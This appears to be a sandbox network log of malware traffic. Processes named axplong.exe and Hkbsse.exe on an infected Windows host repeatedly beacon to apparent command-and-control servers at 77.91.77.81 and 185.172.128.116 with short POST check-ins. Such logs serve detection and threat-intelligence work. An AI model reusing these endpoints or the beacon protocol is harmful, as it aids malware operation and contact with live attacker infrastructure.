Jun 27, 2024 05:59:19.042402983 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:19.235909939 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49786	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:19.181705952 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:19.837619066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:19.850558996 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:20.064320087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49787	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:19.445466042 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:20.049901009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:20.073057890 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:20.267175913 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.7	49788	77.91.77.81	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:20.198091030 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:20.924370050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:20.935827017 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:21.162664890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49789	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:20.597172976 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:21.224607944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:21.236887932 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:21.427211046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49790	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:21.389177084 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:22.094969034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:22.096843958 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:22.315905094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49791	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:21.594512939 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:22.241972923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:22.511073112 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:22.710153103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49792	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:22.748317957 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:23.455945015 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:23.487126112 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:23.707015038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49793	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:22.857007980 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:23.496437073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:23.525342941 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:23.718260050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49794	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:23.887532949 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:24.607357979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:24.608223915 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:24.835694075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49795	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:23.888000965 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:24.522773027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:24.523716927 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:24.715137005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49797	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:24.839355946 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:25.490643024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:25.550004959 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:25.922195911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49798	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:24.948811054 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:25.634660006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:25.665211916 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
